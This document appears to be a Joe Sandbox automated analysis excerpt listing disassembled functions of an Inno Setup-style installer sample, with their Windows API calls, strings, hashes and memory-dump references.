Opcode Fuzzy Hash: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
Instruction Fuzzy Hash: 87F049F0901700DEDB14DF76BEC633B7695E7A8316F18803BA619A51A2D738044CCA5C

Function 00496568 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884,?,?,00000000,0049A628), ref: 004965BF
SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00496642
FindNextFileA.KERNEL32(000000FF,?,00000000,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000), ref: 0049665A
FindClose.KERNEL32(000000FF,00496685,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884), ref: 00496678

Strings

isRS-???.tmp, xrefs: 004965A9
isRS-, xrefs: 004965DF

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstNext
String ID: isRS-$isRS-???.tmp
API String ID: 134685335-3422211394
Opcode ID: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
Instruction ID: 7c4f1729e62c340c3776f645c08a9404eac4e90145c78096892548085370b188
Opcode Fuzzy Hash: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
Instruction Fuzzy Hash: 1A31867190161CAFDF10EF65CC51ACEBBBDDB45314F5144B7A808A32A1EA389F458E58

Function 0044C030 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleacc.dll,?,0044E8DD), ref: 0044C03F
GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C050
GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C060

Strings

CreateStdAccessibleObject, xrefs: 0044C05A
oleacc.dll, xrefs: 0044C03A
LresultFromObject, xrefs: 0044C04A

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
API String ID: 2238633743-1050967733
Opcode ID: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
Instruction ID: 768994a2e6e1f30713717b1c29876c1fd16d3b2562f205e666220538aba0b6e7
Opcode Fuzzy Hash: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
Instruction Fuzzy Hash: BBF01CB0242701CAFB609FF5ECC672632B4E364708F18557BA0016A2E2C7BD9494CF5E

Function 0045678C Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 241windownativeCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456809
PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456830
SetForegroundWindow.USER32(?), ref: 00456841
NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00456B19,?,00000000,00456B55), ref: 00456B04

Strings

Cannot evaluate variable because [Code] isn't running yet, xrefs: 00456984

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: MessagePostWindow$ForegroundNtdllProc_
String ID: Cannot evaluate variable because [Code] isn't running yet
API String ID: 2236967946-3182603685
Opcode ID: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
Instruction ID: c3083c827e1ea9587a1b946928c79dead0c15e552dd32db2ac5f2442617c6554
Opcode Fuzzy Hash: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
Instruction Fuzzy Hash: 6391ED34304204EFDB15DF55C961F5ABBF9EB89305F6280BAEC04A7392C639AE14CB59

Function 00455328 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455467), ref: 00455358
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045535E

Strings

kernel32.dll, xrefs: 00455353
GetDiskFreeSpaceExA, xrefs: 0045534E

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
Instruction ID: 60eca4a99d751df3d3374a87c4cbf3116f086dd8a9115ea48f17d057e3f27308
Opcode Fuzzy Hash: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
Instruction Fuzzy Hash: 0741A331A00649AFCF01EFA5D892AEFB7B8EF49305F504566F800F7252D67C5D088B69

Function 00417CE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00417D1F
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A

Strings

,, xrefs: 00417D61

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
Opcode Fuzzy Hash: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68

Function 00463404 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001,00000000,004635C1), ref: 00463435
FindFirstFileA.KERNEL32(00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 004634C4
FindNextFileA.KERNEL32(000000FF,?,00000000,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463556
FindClose.KERNEL32(000000FF,0046357D,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463570

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Find$File$CloseErrorFirstModeNext
String ID:
API String ID: 4011626565-0
Opcode ID: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
Instruction ID: c18d1c41accea68cb41f5c12e74b437797437286b731c7b532b71dbbd74da020
Opcode Fuzzy Hash: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
Instruction Fuzzy Hash: 7141C870A00658AFCB11EF65CC55ADEB7B8EB88309F4044BAF404A7391E73C9F448E59

Function 00463880 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001,00000000,00463A67), ref: 004638F5
FindFirstFileA.KERNEL32(00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 0046393B
FindNextFileA.KERNEL32(000000FF,?,00000000,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 004639F0
FindClose.KERNEL32(000000FF,00463A1B,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 00463A0E

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Find$File$CloseErrorFirstModeNext
String ID:
API String ID: 4011626565-0
Opcode ID: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
Instruction ID: a32f7eebc160b2c926ffd988aba38ac49d653b749f4bb5a92982eb88da04d6a0
Opcode Fuzzy Hash: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
Instruction Fuzzy Hash: B6418175A00A58DBCB10EFA5DC859DEB7B8EB88305F4044AAF804E7341EB78DF458E49

Function 0042E7A8 Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E7CA
DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E7F5
GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E802
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E80A
SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E810

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorLast$CloseControlCreateDeviceFileHandle
String ID:
API String ID: 1177325624-0
Opcode ID: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
Instruction ID: 97181128065a238999caafd211b152b701c4b4b5d95cf39bc3f304bf3469fa68
Opcode Fuzzy Hash: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
Instruction Fuzzy Hash: 4FF0F0713917203AF620B17A6C82F7B018CCB85F68F10823ABB04FF1C1D9A84C06066D

Function 00481CB0 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00481CEE
GetWindowLongA.USER32(00000000,000000F0), ref: 00481D0C
ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D2E
ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D42

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Window$Show$IconicLong
String ID:
API String ID: 2754861897-0
Opcode ID: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
Instruction ID: bd4bfa8a532e55613b66c26f3878df869b3cba8388d9d733fde35ddb9b3db323
Opcode Fuzzy Hash: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
Instruction Fuzzy Hash: F50171302402455AD700B72A9D45B5F23D8AB17308F08093BBC51DF6B3DBADAC52974C

Function 00461E78 Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,00461F4C), ref: 00461ED0
FindNextFileA.KERNEL32(000000FF,?,00000000,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F0C
FindClose.KERNEL32(000000FF,00461F33,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F26

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
Instruction ID: db92842bd19ae7c5582670e9e06bbe606287ea98b9da9161f37068fcc8ef57ce
Opcode Fuzzy Hash: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
Instruction Fuzzy Hash: 9C21D831A047086ECB15EB65CC41ADEBBBCDB49304F5484F7B808E31B1E7389E45CA5A

Function 004241EC Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004241F4
SetActiveWindow.USER32(?,?,?,0046BD86), ref: 00424201

Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677

Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021325AC,0042421A,?,?,?,0046BD86), ref: 00423B5F

SetFocus.USER32(00000000,?,?,?,0046BD86), ref: 0042422E

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Window$ActiveFocusIconicShow
String ID:
API String ID: 649377781-0
Opcode ID: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
Instruction ID: b114ffa8fbe078055c417a305beb0b6e8983b6333d82b3c601511fe05fbe2975
Opcode Fuzzy Hash: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
Instruction Fuzzy Hash: 07F03A717001208BCB10EFAA98C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8

Function 00417CDE Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00417D1F
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID:
API String ID: 568898626-0
Opcode ID: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
Opcode Fuzzy Hash: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8

Function 004175A8 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004175D3
GetCapture.USER32 ref: 004175DC

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
Instruction ID: 1c917faadd476c588bdf1ff4a00e1594475ac94e71cf422183988d33397b9b13
Opcode Fuzzy Hash: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
Instruction Fuzzy Hash: 85F04F32304A028BDB21A72EC885AEB62F59F84368B14443FE415CB765EB7CDCD58758

Function 004241A4 Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004241AB

Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12

SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF

Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Window$ActiveEnumIconicLongShowWindows
String ID:
API String ID: 2671590913-0
Opcode ID: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
Opcode Fuzzy Hash: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724

Function 004125E8 Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
Instruction ID: b8ba5a3252dd9dd8755954997f8cc70cf1688dd1015ecfd52c1097a8d2c67521
Opcode Fuzzy Hash: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
Instruction Fuzzy Hash: 995106316082058FC710DB6AD681A9BF3E5FF98304B2482BBD854C7392D7B8EDA1C759

Function 00477568 Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004776B6

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
Instruction ID: 23eb90ac0865fb6649058132ab0dcd5e2738ee5152c03834e0ad15106694cca9
Opcode Fuzzy Hash: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
Instruction Fuzzy Hash: B4412775608505EFCB10CF9DC6808AABBF5FB48320BB5C996E848DB719D338EE419B54

Function 0045C95C Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045C967

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CryptFour
String ID:
API String ID: 2153018856-0
Opcode ID: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
Instruction ID: 196b54fe7aa8ab1053afe2cffafcf6ed6da51dc24599f2bb869cb02721a3a021
Opcode Fuzzy Hash: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
